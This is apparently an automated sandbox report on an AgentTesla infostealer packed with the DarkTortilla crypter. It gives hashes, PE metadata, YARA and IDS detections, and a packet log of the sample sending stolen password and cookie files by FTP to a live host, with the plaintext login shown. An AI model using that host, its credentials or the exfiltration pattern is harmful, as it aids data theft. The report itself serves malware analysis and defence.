SSDEEP: 24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5: 933D6D14518371B212F36C3835794D75
SHA1: 92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256: 55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512: EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:modified
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.17378132360892
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:tTXQS6DONV.exe
                              File size:832'000 bytes
                              MD5:2788e0e233dfa0671c63179549ad16ed
                              SHA1:d9edf6671d0e7abf960a1c5dc8c6a126ec8f2c23
                              SHA256:5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124
                              SHA512:359e41da27a9e214d2d08eb8f340a6951a53a717078254cf4889e039c9cbc86e7f159fb2c94fa1f9f49d6f80d2fa667f67f7084d074f6a82726578c8c5f6a6da
                              SSDEEP:12288:o53yuZG8+De1kIse8LRWjrZCollIoNE8krZu3zvK541r8m:o53yuZGVteKRyjl6ikdCzvy41r
                              TLSH:3105F18C03FCAAA0F97E2BB5C57611444B74B447B872E35C46C090FA6E73BE19992763
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-e................................. ........@.. ....................... ............`................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x4cc8fe
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x652DFCF2 [Tue Oct 17 03:18:10 2023 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcc8ac | 0x4f | .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xce000 | 0x3c4 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x2000 | 0xca904 | 0xcaa00 | 1b3e31a2473c164883787f4367ae59c0 | False | 0.7668648307371992 | data | 7.181596373025786 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc | 0xce000 | 0x3c4 | 0x400 | 2800b6122761f81bd5ccb26731108a6b | False | 0.4169921875 | data | 3.3057956221571367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0xd0000 | 0xc | 0x200 | d9965fe73f81b8deb70ddf0299a784b0 | False | 0.041015625 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_VERSION | 0xce058 | 0x36c | data | | | 0.4463470319634703
                              DLL | Import
                              mscoree.dll | _CorExeMain
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2024-12-05T17:15:13.897832+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.6 | 49872 | 162.241.203.30 | 21 | TCP
                              2024-12-05T17:15:14.830894+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.6 | 49881 | 162.241.203.30 | 34513 | TCP
                              2024-12-05T17:15:14.951271+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.6 | 49881 | 162.241.203.30 | 34513 | TCP
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Dec 5, 2024 17:15:09.886590004 CET | 56534 | 53 | 192.168.2.6 | 1.1.1.1
                              Dec 5, 2024 17:15:10.379842043 CET | 53 | 56534 | 1.1.1.1 | 192.168.2.6
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Dec 5, 2024 17:15:09.886590004 CET | 192.168.2.6 | 1.1.1.1 | 0x8975 | Standard query (0) | ftp.aminhacorretora.com.br | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Dec 5, 2024 17:15:10.379842043 CET | 1.1.1.1 | 192.168.2.6 | 0x8975 | No error (0) | ftp.aminhacorretora.com.br | aminhacorretora.com.br | | CNAME (Canonical name) | IN (0x0001) | false
                              Dec 5, 2024 17:15:10.379842043 CET | 1.1.1.1 | 192.168.2.6 | 0x8975 | No error (0) | aminhacorretora.com.br | | 162.241.203.30 | A (IP address) | IN (0x0001) | false
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                              Dec 5, 2024 17:15:11.669972897 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220-You are user number 13 of 150 allowed.
                                  220-Local time is now 13:15. Server port: 21.
                                  220-IPv6 connections are also welcome on this server.
                                  220 You will be disconnected after 15 minutes of inactivity.
                              Dec 5, 2024 17:15:11.670293093 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | USER logsftp@aminhacorretora.com.br
                              Dec 5, 2024 17:15:12.005503893 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 331 User logsftp@aminhacorretora.com.br OK. Password required
                              Dec 5, 2024 17:15:12.005969048 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | PASS _yA=,M5*J?KH
                              Dec 5, 2024 17:15:12.443470001 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 230 OK. Current restricted directory is /
                              Dec 5, 2024 17:15:12.775660038 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 504 Unknown command
                              Dec 5, 2024 17:15:12.775881052 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | PWD
                              Dec 5, 2024 17:15:13.110002995 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 257 "/" is your current location
                              Dec 5, 2024 17:15:13.110349894 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | TYPE I
                              Dec 5, 2024 17:15:13.443512917 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 200 TYPE is now 8-bit binary
                              Dec 5, 2024 17:15:13.443684101 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | PASV
                              Dec 5, 2024 17:15:13.776614904 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 227 Entering Passive Mode (162,241,203,30,134,209)
                              Dec 5, 2024 17:15:13.897831917 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | STOR PW_user-124406_2024_12_05_11_15_08.html
                              Dec 5, 2024 17:15:14.830497026 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 150 Accepted data connection
                              Dec 5, 2024 17:15:15.163136959 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 226-File successfully transferred
                                  226 0.332 seconds (measured here), 0.95 Kbytes per second
                              Dec 5, 2024 17:15:15.215975046 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | PASV
                              Dec 5, 2024 17:15:15.550373077 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 227 Entering Passive Mode (162,241,203,30,132,191)
                              Dec 5, 2024 17:15:15.671236992 CET | 49872 | 21 | 192.168.2.6 | 162.241.203.30 | STOR CO_user-124406_2024_12_05_11_15_14.zip
                              Dec 5, 2024 17:15:16.602121115 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 150 Accepted data connection
                              Dec 5, 2024 17:15:16.935152054 CET | 21 | 49872 | 162.241.203.30 | 192.168.2.6 | 226-File successfully transferred
                                  226 0.333 seconds (measured here), 10.12 Kbytes per second

                              Target ID:1
                              Start time:11:13:57
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\tTXQS6DONV.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tTXQS6DONV.exe"
                              Imagebase:0xe90000
                              File size:832'000 bytes
                              MD5 hash:2788E0E233DFA0671C63179549AD16ED
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:5
                              Start time:11:14:35
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xe70000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false


                                Execution Graph

                                Execution Coverage:19.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:8.5%
                                Total number of Nodes:106
                                Total number of Limit Nodes:6

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbde6baf714d68530db6f30d2642d2712452995b365dc7f251ac53a26610ac1f
                                • Instruction ID: e2485a3803e863381aa82a56731007734512a108523fab92558fbbf64e438d05
                                • Opcode Fuzzy Hash: cbde6baf714d68530db6f30d2642d2712452995b365dc7f251ac53a26610ac1f
                                • Instruction Fuzzy Hash: 8CB32670A166198BDB28FF79E99966CBBF2BB89301F4045E9D089A7350DF305D84CF81

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38021f97a248d1c7128bb1b046a36b8536904563b16c855f7826b537d06261f3
                                • Instruction ID: 9386eebbfa54a974129f43dfa30bd2a61a93704faa33ebf6902f4734b8d069a7
                                • Opcode Fuzzy Hash: 38021f97a248d1c7128bb1b046a36b8536904563b16c855f7826b537d06261f3
                                • Instruction Fuzzy Hash: 03B32670A166198BDB28FF79E99966CBBF2BB89301F4045E9D089A7350DF305D84CF81

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000001.00000002.2893918898.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_55a0000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c9de5b9256473806cba7fab5bc68ed1bb5a9df48821dfd8d2bf00247d106fec
                                • Instruction ID: 9628aca3457da9e436538bbecd111b86ba19cccb15b96103d5d1b01a43bfa08c
                                • Opcode Fuzzy Hash: 7c9de5b9256473806cba7fab5bc68ed1bb5a9df48821dfd8d2bf00247d106fec
                                • Instruction Fuzzy Hash: 8CB3F770A1521A8FDB58FF78D99966CBBF2BB88200F4085EAD488A7354DF305D94DF81

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: e\1$e\1$"*p$"*p
                                • API String ID: 0-1513742261
                                • Opcode ID: 0961bbd8ef52d7e9fe7755537e4f34796a8970b9f7649bfcb9f408c588ec7dfd
                                • Instruction ID: c944699d5308b774fee1623775763b29ca8713f4dba9b0a18ca0d928a27ca36b
                                • Opcode Fuzzy Hash: 0961bbd8ef52d7e9fe7755537e4f34796a8970b9f7649bfcb9f408c588ec7dfd
                                • Instruction Fuzzy Hash: A581E0B0D152198FDF14CFE5D9846EEFBB2AB89300F60946AD426BB254DB345A02CF64

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: G
                                • API String ID: 0-985283518
                                • Opcode ID: 87069dc0bc1db4c1b0ee317a65d4419df96fb20f11515f2214392d693b8b5d5f
                                • Instruction ID: 7da6461a8472bc62c3a6b403835f1b91aba24fc88f8bed32effe2f31cd02f9a6
                                • Opcode Fuzzy Hash: 87069dc0bc1db4c1b0ee317a65d4419df96fb20f11515f2214392d693b8b5d5f
                                • Instruction Fuzzy Hash: 85437C70A156598BCB64FF78E88966DBBB2FF88300F8044E9E948A7340DE346D94CF55

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c633a62e4fc3a39026a6ff2fb7fbdc53f2751569b8c56663d9056dc1483f7a07
                                • Instruction ID: 7f80dc4307a905a37a5d5eff758779737243bf8fe8ba39c257a0b2088e5739e0
                                • Opcode Fuzzy Hash: c633a62e4fc3a39026a6ff2fb7fbdc53f2751569b8c56663d9056dc1483f7a07
                                • Instruction Fuzzy Hash: FA436C70A156598BCB68FF78E88966DBBB2FF88300F8044E9D948A7340DE346D94CF55

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$6f
                                • API String ID: 0-3590766845
                                • Opcode ID: fee1ac10eab72ca02075a5737c0b917fc9e95d6cee843e65321dcda566c08563
                                • Instruction ID: 234861ebba62d4a5cb01e7a3de257160035180dae76f511348a94827b3cac492
                                • Opcode Fuzzy Hash: fee1ac10eab72ca02075a5737c0b917fc9e95d6cee843e65321dcda566c08563
                                • Instruction Fuzzy Hash: 55711FB8E10208DFDB44DFA5D5956AEBBB2FF89300F20846AE41ABB354DB304946CF51

                                Control-flow Graph

                                APIs
                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07B9BDC3
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: CreateProcessUser
                                • String ID:
                                • API String ID: 2217836671-0
                                • Opcode ID: 1f83275c005dc0b9c4895a3a851d3d8556bbf418285f561662e93c7936974d3d
                                • Instruction ID: 4b27d0e1917300294a4c11d4048652913660ff9ee28ada0866d678a6a55eef52
                                • Opcode Fuzzy Hash: 1f83275c005dc0b9c4895a3a851d3d8556bbf418285f561662e93c7936974d3d
                                • Instruction Fuzzy Hash: FF51E5B190022ADFDF24CF59D840BDEBBB5BF48710F0484AAE918B7254DB719A85CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: kQD
                                • API String ID: 0-3066535408
                                • Opcode ID: e4b16f167653eced51efb33e94ce897855d8144d94c6797dd7dcc8d4208d01f3
                                • Instruction ID: 5ca9988d6c35f354a203262ed42e77c56ae13d22a72d1d47a600648faa7a0f14
                                • Opcode Fuzzy Hash: e4b16f167653eced51efb33e94ce897855d8144d94c6797dd7dcc8d4208d01f3
                                • Instruction Fuzzy Hash: D3C145B4D1421ADFCB04CFA9C5809AEFBB2FF8A300F90995AD415AB214C734A947DF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f
                                • API String ID: 0-3135077484
                                • Opcode ID: cea444127ef5244537d852900fba6973813f48abcfafaf28c26394295add3735
                                • Instruction ID: 88bf2fb02eb3ce7edb0325c943143ed23ae80305bdb29b6e48acfd0a1e7ff479
                                • Opcode Fuzzy Hash: cea444127ef5244537d852900fba6973813f48abcfafaf28c26394295add3735
                                • Instruction Fuzzy Hash: EB71F0B8E10208DFDB48DFA5D4956AEBBB2FF89300F20946AE41AB7354DB305946CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f
                                • API String ID: 0-3135077484
                                • Opcode ID: 77c5797be9bfa8c3e1c63e490daf8e9b6682ebb1bf8588bc519394f2d467a757
                                • Instruction ID: f5ff1a4d099567a5163982e17d47bb1d93d7e914725d8dd9a194695805d57057
                                • Opcode Fuzzy Hash: 77c5797be9bfa8c3e1c63e490daf8e9b6682ebb1bf8588bc519394f2d467a757
                                • Instruction Fuzzy Hash: 2271FFB8E10208DFDB48DFA5D5956AEBBB2FF89300F20946AE41AB7354DB305946CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: 0ef40e431e5ecb25cc84a71ef501d08d4e0b222b283563773e54c52bb2d9b153
                                • Instruction ID: 24d748446eea35dab861f3bffc5d5e81fb568de1312f28d1636024ac61e63a29
                                • Opcode Fuzzy Hash: 0ef40e431e5ecb25cc84a71ef501d08d4e0b222b283563773e54c52bb2d9b153
                                • Instruction Fuzzy Hash: CC516DB1E1421A8FDB08CFA9C8406EEFBF2FF89201F64D56AD429A7250D7344942DF94
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: 7b4a0dbed3c989ef8be58cdb54024a42000557a2f640be653c42cf0bd962714a
                                • Instruction ID: 0c079dba8473afe84f5d1c5ac45282d9ced6b96bf658a5a88e8a9dece045db16
                                • Opcode Fuzzy Hash: 7b4a0dbed3c989ef8be58cdb54024a42000557a2f640be653c42cf0bd962714a
                                • Instruction Fuzzy Hash: D65147B0E142198FDB08CFA9C8406EEFBF2BF89201F64D42AD419B7254D7348942DFA4
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6dee7e875c4971d3986610cb12ee68ed7b633dbf6f6cda102ec72e6c351e64c
                                • Instruction ID: 9987af163d68a8d62acac2266336dc56f95f9c9bbc241b8da484ebc19bfef1d0
                                • Opcode Fuzzy Hash: f6dee7e875c4971d3986610cb12ee68ed7b633dbf6f6cda102ec72e6c351e64c
                                • Instruction Fuzzy Hash: F1C28070B152198BC724FF78E8997ADB7B2BF88300F8185A9E848A7344DF349D95CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: fbd2910a8674e92b6104408661ad9b3d92a94ae146faf58b91623f31caa71764
                                • Instruction ID: 31a384e8cbaaaece91fdd0d2825db908fb169ed24d9dc5c2ffec36f7fbf30470
                                • Opcode Fuzzy Hash: fbd2910a8674e92b6104408661ad9b3d92a94ae146faf58b91623f31caa71764
                                • Instruction Fuzzy Hash: B45154B5E01658CFDB58CFAAC9446DDBBF2AFC9301F14C4AA9409AB364DB345A85CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 7b228f361169d2d9e3eaaf3255ab3bcb25fdbd8ab799c9b8afe82c2934781dca
                                • Instruction ID: 6b74b5594ed1246ec4fc2e3f62e2600b4ad88d6f9456ce7a55871c1aa16bd18e
                                • Opcode Fuzzy Hash: 7b228f361169d2d9e3eaaf3255ab3bcb25fdbd8ab799c9b8afe82c2934781dca
                                • Instruction Fuzzy Hash: 3A5157B1E01658CFDB58DFAAC9446DDBBF2AFC9300F54C4AA9409AB264DB345A85CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 47fd5c6b50fb1b33b8e80eb902516e2e9bfeb26f0ff771ef2c039cb34cfdd81a
                                • Instruction ID: 3122369a058f704bdab2741c7135c35e336b1b4db5ee2f5c2e9f0e10afc0d515
                                • Opcode Fuzzy Hash: 47fd5c6b50fb1b33b8e80eb902516e2e9bfeb26f0ff771ef2c039cb34cfdd81a
